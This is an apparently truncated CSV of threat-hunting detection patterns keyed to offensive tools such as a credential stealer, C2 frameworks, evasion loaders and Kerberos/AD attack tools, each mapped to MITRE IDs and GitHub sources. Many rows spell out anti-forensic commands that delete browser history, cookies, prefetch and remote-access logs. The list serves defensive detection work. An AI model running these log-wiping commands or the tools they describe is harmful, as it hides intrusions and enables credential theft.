"*dekrypted/Fentanyl*",".{0,1000}dekrypted\/Fentanyl.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","1","N/A","10","1","57","13","2023-03-13T20:03:44Z","2022-07-22T16:30:13Z" "*del *C:\Program Files*\TeamViewer\TeamViewer*_Logfile.log*",".{0,1000}del\s.{0,1000}C\:\\Program\sFiles.{0,1000}\\TeamViewer\\TeamViewer.{0,1000}_Logfile\.log.{0,1000}","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*del *C:\Users\*\AppData\Roaming\AnyDesk\connection_trace.txt*",".{0,1000}del\s.{0,1000}C\:\\Users\\.{0,1000}\\AppData\\Roaming\\AnyDesk\\connection_trace\.txt.{0,1000}","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*DEL /q /f %appdata%\Google\Chrome\""User Data""\Default\*.tmp*",".{0,1000}DEL\s\/q\s\/f\s\%appdata\%\\Google\\Chrome\\\""User\sData\""\\Default\\.{0,1000}\.tmp.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f %appdata%\Google\Chrome\""User Data""\Default\History\*.*",".{0,1000}DEL\s\/q\s\/f\s\%appdata\%\\Google\\Chrome\\\""User\sData\""\\Default\\History\\.{0,1000}\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f %appdata%\Microsoft\Windows\Recent\*.*",".{0,1000}DEL\s\/q\s\/f\s\%appdata\%\\Microsoft\\Windows\\Recent\\.{0,1000}\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f %windir%\*.log*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\.{0,1000}\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f %windir%\*.tmp*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\.{0,1000}\.tmp.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f %windir%\Prefetch\*.pf*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\Prefetch\\.{0,1000}\.pf.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f %windir%\system\*.log*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\system\\.{0,1000}\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f %windir%\system\*.tmp*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\system\\.{0,1000}\.tmp.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f %windir%\system32\*.log*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\system32\\.{0,1000}\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f %windir%\system32\*.tmp*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\system32\\.{0,1000}\.tmp.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f %windir%\Temp\*.inf*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\Temp\\.{0,1000}\.inf.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f %windir%\Temp\*.lnk*",".{0,1000}DEL\s\/q\s\/f\s\%windir\%\\Temp\\.{0,1000}\.lnk.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f /s %appdata%\Microsoft\Windows\Cookies\*.*",".{0,1000}DEL\s\/q\s\/f\s\/s\s\%appdata\%\\Microsoft\\Windows\\Cookies\\.{0,1000}\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f /s %appdata%\Microsoft\Windows\Cookies\*.**",".{0,1000}DEL\s\/q\s\/f\s\/s\s\%appdata\%\\Microsoft\\Windows\\Cookies\\.{0,1000}\..{0,1000}.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f /s %appdata%\Microsoft\Windows\Recent\*.*",".{0,1000}DEL\s\/q\s\/f\s\/s\s\%appdata\%\\Microsoft\\Windows\\Recent\\.{0,1000}\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f /s %appdata%\Mozilla\Firefox\Profiles\*.*",".{0,1000}DEL\s\/q\s\/f\s\/s\s\%appdata\%\\Mozilla\\Firefox\\Profiles\\.{0,1000}\..{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f /s %userprofile%\*.log*",".{0,1000}DEL\s\/q\s\/f\s\/s\s\%userprofile\%\\.{0,1000}\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DEL /q /f /s %userprofile%\*.tmp*",".{0,1000}DEL\s\/q\s\/f\s\/s\s\%userprofile\%\\.{0,1000}\.tmp.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*deleg_enum_imp*",".{0,1000}deleg_enum_imp.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*Delegation/delegation.py*",".{0,1000}Delegation\/delegation\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*delegation_constrained_objects.txt*",".{0,1000}delegation_constrained_objects\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*delegation_constrained_w_protocol_transition_objects.txt*",".{0,1000}delegation_constrained_w_protocol_transition_objects\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*delegation_rbcd_objects.txt*",".{0,1000}delegation_rbcd_objects\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","0","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*delegation_unconstrained_objects.txt*",".{0,1000}delegation_unconstrained_objects\.txt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*DelegationBOF.*",".{0,1000}DelegationBOF\..{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","1","N/A","N/A","10","133","21","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z" "*DELETE FROM LDAPHUNTERFINDINGS*",".{0,1000}DELETE\sFROM\sLDAPHUNTERFINDINGS.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","10","2","191","27","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z" "*DeleteKey(*SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\*",".{0,1000}DeleteKey\(.{0,1000}SOFTWARE\\\\Microsoft\\\\Windows\sNT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*DeletePSscriptSignning.bat*",".{0,1000}DeletePSscriptSignning\.bat.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*DeleteScheduleTask(LPCSTR computerName*",".{0,1000}DeleteScheduleTask\(LPCSTR\scomputerName.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*deliver.exe -d -c * -f*.enc*",".{0,1000}deliver\.exe\s\-d\s\-c\s.{0,1000}\s\-f.{0,1000}\.enc.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*deliver.exe -d -f *.enc*",".{0,1000}deliver\.exe\s\-d\s\-f\s.{0,1000}\.enc.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*dementor - rough PoC to connect to spoolss to elicit machine account authentication *",".{0,1000}dementor\s\-\srough\sPoC\sto\sconnect\sto\sspoolss\sto\selicit\smachine\saccount\sauthentication\s.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*dementor.py -d * -u * -p *",".{0,1000}dementor\.py\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","rough PoC to connect to spoolss to elicit machine account authentication","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*demo-bof.cna*",".{0,1000}demo\-bof\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","247","48","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*demo-client.exe *",".{0,1000}demo\-client\.exe\s.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*demo-controller.exe *",".{0,1000}demo\-controller\.exe\s.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*demonizedshell.sh*",".{0,1000}demonizedshell\.sh.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - 